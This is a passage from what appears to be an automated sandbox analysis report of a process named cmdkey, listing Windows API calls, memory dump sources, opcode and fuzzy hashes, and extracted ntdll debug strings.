                                                  • RtlAllocateHeap.NTDLL(00A41AE6,?,00A5580B,00A41AE6,00A557FF,00A5580B,?,00A41AE6,00A557FF,00001000,?,?,00000000), ref: 00A5985F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction ID: 309b32de1aa88c0d9321cb48cb1688a6e1efa58832a8cefbce71c9067242ddbe
                                                  • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                  • Instruction Fuzzy Hash: 93E065B22042047BCA10EE59DC42FAB77ACEF89B10F004019FA08A7242CA70B8118BB9
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEB8,00000007,00000000,00000004,00000000,00A43EA1,000000F4), ref: 00A598AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                  • Instruction ID: acbd713ff0f8e9fc3a3866bdcf41de21d4ce8c85aade6bfa11503a9124680c3a
                                                  • Opcode Fuzzy Hash: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                  • Instruction Fuzzy Hash: 34E065B6204204BBDA10EE59EC41FAB77ADEFC8710F004009FA0CA7241D670B8108AB8
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A484BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                  • Instruction ID: e4168cfa905b2f6d8b8e9ea485f4779545eccdc5504503b802b541e4d3e0d58b
                                                  • Opcode Fuzzy Hash: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                  • Instruction Fuzzy Hash: 1DE0807565020467E72467B8EC45F79335C9788724F594950B91CDB5C1D67CF9414150
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00A41DE0,00A5813F,00A557FF,00A41DB0), ref: 00A482B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                  • Instruction ID: 1c783adc2d2024ed0eab6c8862a628e7e0dc6bba127714dee15e5edd39934c93
                                                  • Opcode Fuzzy Hash: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                  • Instruction Fuzzy Hash: FFE0C2792402043BE600A6E1AD06F7932DCA784354F040468BD18EB2C2EDB9A4104564
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00A41DE0,00A5813F,00A557FF,00A41DB0), ref: 00A482B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                  • Instruction ID: 0f06e43cdadbbe76ea461dc81b2c3591d0e78e355983d2a4bbf3d6789ee0f41c
                                                  • Opcode Fuzzy Hash: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                  • Instruction Fuzzy Hash: 36D05E766802047BE600F6E59D07F6A32CCAB44754F044464BD18EB3C2E9A9F41046A5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ba79bd721edc1809d3385598f53de68f5f2f19f6d3276533ab03d348920f69d6
                                                  • Instruction ID: 076e8ee1d2ad174387c3ec302483a27ad4ca5cc68030a181da578b2b4f9f546d
                                                  • Opcode Fuzzy Hash: ba79bd721edc1809d3385598f53de68f5f2f19f6d3276533ab03d348920f69d6
                                                  • Instruction Fuzzy Hash: B2B09B71D014C5C5DA51DF6047087177A0467D0705F15C457E1460A51F8778C491F17B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                  • Instruction ID: d616b8dedcbcb7431d8c98698b6d5ebd01986699ecffbee81466131ca397271f
                                                  • Opcode Fuzzy Hash: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                  • Instruction Fuzzy Hash: 6441B075A1CB094FD368EF6894C16B6B2E5FB8A300F10452DD88BC3252EB74E8468685
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3754132690
                                                  • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                  • Instruction ID: afb6ae9482476a43432b0eddd1ebf619e092213d19e99a8c0b241c49a38dc609
                                                  • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                  • Instruction Fuzzy Hash: 62914FF04483988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                                  Strings
                                                  • Execute=1, xrefs: 0348451E
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03484530
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03484592
                                                  • ExecuteOptions, xrefs: 034844AB
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03484460
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03484507
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0348454D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: bdf7c5280c48894e8c984143dbb32709b9de975e3d6a7a5c505c573e9f45dcb4
                                                  • Instruction ID: 2508052273b55a42ec9e2e8e6339c22d1978217638a387e3fa65e8ce62bee962
                                                  • Opcode Fuzzy Hash: bdf7c5280c48894e8c984143dbb32709b9de975e3d6a7a5c505c573e9f45dcb4
                                                  • Instruction Fuzzy Hash: DF51FA31A00319AEFF10EB95DC95FAE77A9AF04314F0404BBE5159F291DB709A468B58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@$@ww
                                                  • API String ID: 0-2844824024
                                                  • Opcode ID: fef429146a684a4d2389549d15a64e6e8e76531868ae30f578bdc547ee60e314
                                                  • Instruction ID: 935f14dcb1f8d90568f4d89b816daaeeb6385184e30276780bd3948eeb4858fb
                                                  • Opcode Fuzzy Hash: fef429146a684a4d2389549d15a64e6e8e76531868ae30f578bdc547ee60e314
                                                  • Instruction Fuzzy Hash: 66814A71D006699BDB35CF54CC44BEEBAB8AB08710F0445EBE919BB290D7709E85CFA4